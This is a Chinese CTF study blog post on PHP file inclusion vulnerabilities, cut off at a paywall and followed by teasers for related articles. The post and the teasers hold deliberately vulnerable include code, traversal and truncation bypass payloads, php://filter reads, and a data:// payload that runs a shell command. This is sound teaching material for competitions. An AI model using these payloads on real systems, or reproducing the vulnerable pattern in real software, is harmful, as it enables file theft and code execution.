CTF之web学习记录 -- 文件包含

最新推荐文章于 2024-05-01 18:17:23 发布
最新推荐文章于 2024-05-01 18:17:23 发布
阅读量1.7w 收藏 34
点赞数 10
分类专栏: 网络安全 ctf web 文章标签: 网络安全 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/A951860555/article/details/116611177
版权

文件包含

概述

  后端编程人员一般会把重复使用的函数写到单个文件中,需要使用时再直接调用此文件即可,该过程也就被称为文件包含。文件包含的存在使得开发变得更加灵活和方便,但同时也带了安全问题,导致客户端可以远程调用文件,造成文件包含漏洞。这个漏洞在php中十分常见,其他语言也有。

常见文件包含函数和原理

# php

include()  // 执行到include时才包含文件,找不到文件产生警告,脚本继续执行
require()  // 程序运行就包含文件,找不到文件产生错误,脚本停止

include_once()
require_once()
// 和前面注解一样,_once()后缀表明只会包含一次,已包含则不会再包含

  文件包含漏洞的原理在于用文件包含函数引入的文件,不管其扩展名如何,都会被当作php代码解析,如何无法解析,就会展示其文件内容。

本地文件包含

  本地文件包含,Local File Inclusion,LFI。以下面的php代码为例子,将会展示本地文件包含漏洞的利用。

<?php
    $file = $_GET['file'];
    include $file;
?>

  我们将file的参数设置为../../../../../../../../../flag,其中../代表回退到上一级目录,这里回退多了没关系,到根目录后就不会再走了。所以在网页中输入这样的payload会将根目录下flag文件的内容回显出来。

flag
  但一般php代码不会这么好心,会存在一些限制,大家可以在做题过程中逐渐积累经验,以下面的php代码为例,介绍一些基本的绕过技巧。

<?php
    $file = $_GET['file'];
    include $file.'.php';
?>

  上面的代码会将传进来的file名加上php后缀,所以直接输入flag是无法获取到文件内容,因为本地并不存在flag.php。这里可以用下面的方式进行绕过:

# %00绕过
# 需要 magic_quotes_gpc=off,PHP小于5.3.4有效
?file=../../../../../../../../../flag%00

# 路径长度截断
# Linux 需要文件名长于 4096,Windows 需要长于 256
?file=../../../../../../../../../flag/././././././.[]/./././././.

# 点号截断
# 只适用 Windows,点号需要长于 256
?file=../.
最低0.47元/天 解锁文章
__lifanxin
关注
  • 10
    点赞
  • 34
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctf.show刷题记录_web(1-10)
szgyunyun的博客
06-28 637
`https://ctf.show/ 2、web2 正常页面: 3个字段,返回来再看一下 获取字段值 flag: 3、web3 看题,属于代码审计文件操作漏洞 根据代码判断,最典型的远程文件包含漏洞 利用方式有两种:利用:在GET请求url参数里面传入 远程文件包含还有一种PHP输入输出流的利用方式,可以直接执行POST代码,这里我们仍然用上面这个代码测试,只要执行POST请求 pastdata: php常见命令执行函数 flag: 4、ctf.show_web4 页面和web3一样,
CTF文件包含
qq_45086218的博客
02-28 3148
文章目录php伪协议data伪协议日志文件session文件竞争死亡绕过base64编码绕过 本文以ctf.show网站题目为例,总结ctf中的文件包含漏洞 php伪协议 ?file=php://filter/convert.base64-encode/resource=flag.php data伪协议 ?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs= PD9waHAgc3lzdGVtKCdjYXQgZmxh
2024年网络安全CTF ——web_文件包含
最新发布
2401_84253037的博客
05-01 72
文件包含类型分为两种,一种是本地文件包含,另一种是远程文件包含
CTF-文件包含(持续更新)
m0_74317362的博客
07-28 1049
任意文件包含漏洞处理方法和实例
ctf 文件包含总结
njqfb的博客
06-04 1589
php伪协议 文件包含用到伪协议的情况挺多 php://input php://input是个可以访问请求的原始数据的只读流,可以理解为读取到的POST上传的数据 当协议当作文件打开时,POST上传的内容相当于文件内容,enctype="multipart/form-data" 的时候 php://input 是无效的 利用: 使用php://input协议并POST要执行的代码 绕过file_get_contents函数进行的文件内容检测,比如函数打开一个文件,并验证文件内容是否为xxx,此时可以用php
CTF基础知识及web
m0_60484735的博客
04-21 7708
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录CTF基础知识一、CTF简介二、CTF赛事介绍三、CTF竞赛模式1.解题模式(Jeopardy)2.攻防模式(Attack-Defense)3.混合模式(Mix)四、CTF竞赛内容国内外著名赛事1、国际知名CTF赛事2、国内知名CTF赛事五、如何学习CTF1、分析赛题2、常规操作3、入门知识推荐书籍 CTF基础知识 一、CTF简介 CTF(Capture The Flag)夺旗比赛,在网络安全领域中指的是网络安全技术人员之间进行.
CTF·WEB入门之路
qq_54502707的博客
12-12 6751
Hello~大家好,这里是KOKO师傅! 对于初学者来说,打CTF之路仿佛是摸石头过河,而今天这篇文章则是一篇“从入门到入土”级别的概括类文章。从这篇文章中你可以了解到CTF的一些基本知识、WEB方向的主要知识点、常见知识点······真正意义上的实现入门!
CTF-100题.-天天练习-学习
11-01
CTF-100题.-----------------天天练习------------------学习 100小题,试例练习
ctfweb攻防工具-御剑1.5.7z
04-06
御剑1.5版本
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
内容概要: CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息... 使用场景: ... 其他说明: ...
CTF-web学习大纲
01-30
CTF-web学习大纲
ctf-web网络安全课程视频.zip
10-19
网盘文件永久链接 1 - 代码执行与命令执行安全漏洞与防御... 2 - 文件上传安全漏洞与防御... 3 - XXE安全漏洞与防御... 4 - SSRF安全漏洞与防御... 5 - PHP反序列化安全漏洞与防御... 6 - Python 安全开发基础...
ctfshow---文件包含
fainpo的博客
03-20 668
伪协议读取即可。
BUUCTF WEB刷题记录
weixin_48170459的博客
06-13 257
第一题 刚打开的页面 看源码,发现source.php 访问source.php 我们要用file参数带出flag,但是有白名单限制。第一个判断是对file本身的值进行判断,第二个和第三个是对?前面的file值进行判断,所以我们可以从第二个和第三个入手。 构造file值为source.php?../…/…/…/…/…/…/…/…/…/…/flag(要进行URL编码) 额,啥都没有,换成etc/passwd试试 没有flag。然后发现代码白名单有个hint.php,访问一下看看 好吧,找到flag
PHP文件包含漏洞代码分析-通过漏洞getshell-学习笔记
ZhangAweio的博客
04-06 679
假设我们有一个网站有上传漏洞,但我们并不能进行直接getshell,这时候我们就用到这漏洞来进行getshell假如我们有个网站已经成功上传shell 了,但是无法运行,因为是其他格式的那么我们可以通过文件包含漏洞来进行getshell首先写入一句话木马成功访问不是PHP结尾的文件文件包含漏洞危害及其大,如有被利用不堪设想。
云演 CTF Web题型 lfi 文件包含
cadandme的博客
01-22 2990
文件包含 打开页面,典型的文件包含文件包含的读取格式如下: ?file=php://filter/read=convert.base64-encode/resource=flag 读取到base64编码再解码,就得到 因为解码后还有url编码存在,谨慎起见,放到URL解码,得到真正的flag ...
ctfshow-文件包含
m0_74456293的博客
03-27 526
ctfshow-文件包含
ctfshow web入门 命令执行payload
2h4ox1n9
06-15 1200
ctfshow web
ctf任意文件包含漏洞简单讲解含php伪协议及习题
qq_59950255的博客
11-26 1836
先来看看什么是文件包含 在开发的过程中,遇到一些需要经常重复使用的代码,如果每次都重新写入,会造成很大的麻烦,所以,我们会将这些需要大量使用的重复代码写入一个文件中,在项目中通过函数引入这个文件,那么就可以做到代码的插入。 这些代码由几个函数引入 1.include()函数 include()函数,是临时加载的,在读到该函数时,才会包含里面的文件。include()在执行的时候如果: "合法代码" include('XXXX')假如include读取的文件不存在,他的上下两个"合法代码"都会执..
ctf工具之binwalk--windows下(misc).rar
07-30
binwalk是一款用于分析和提取嵌入在二进制文件中的文件和数据的工具。对于CTF比赛来说,binwalk可以帮助我们进行文件的分析和提取,从而更好地理解题目并解决问题。 在Windows下使用binwalk,我们首先需要在官方网站(https://github.com/ReFirmLabs/binwalk)下载并安装binwalk的Windows版本。安装完成后,我们可以在命令行中使用binwalk命令进行操作。 拿到CTF题目中的misc.rar文件后,我们可以使用binwalk来分析该文件。在命令行中,我们输入以下命令: binwalk misc.rar binwalk会对该文件进行分析,并将分析结果显示在命令行中。它会检测并提取出文件中的隐藏信息,并尝试识别文件中可能存在的其他类型文件(如图像、压缩包等)。 除了显示分析结果外,binwalk还支持提取文件中的隐藏文件。我们可以使用以下命令来提取隐藏文件: binwalk -e misc.rar 这会将隐藏在misc.rar中的文件提取到当前目录中。我们可以通过查看提取出的文件来获得进一步的线索或解答。 总之,binwalk是一款强大的CTF工具,它可以帮助我们分析和提取嵌入在二进制文件中的文件和数据。在Windows下使用binwalk可以通过命令行进行操作,从而更好地解决CTF比赛中的问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值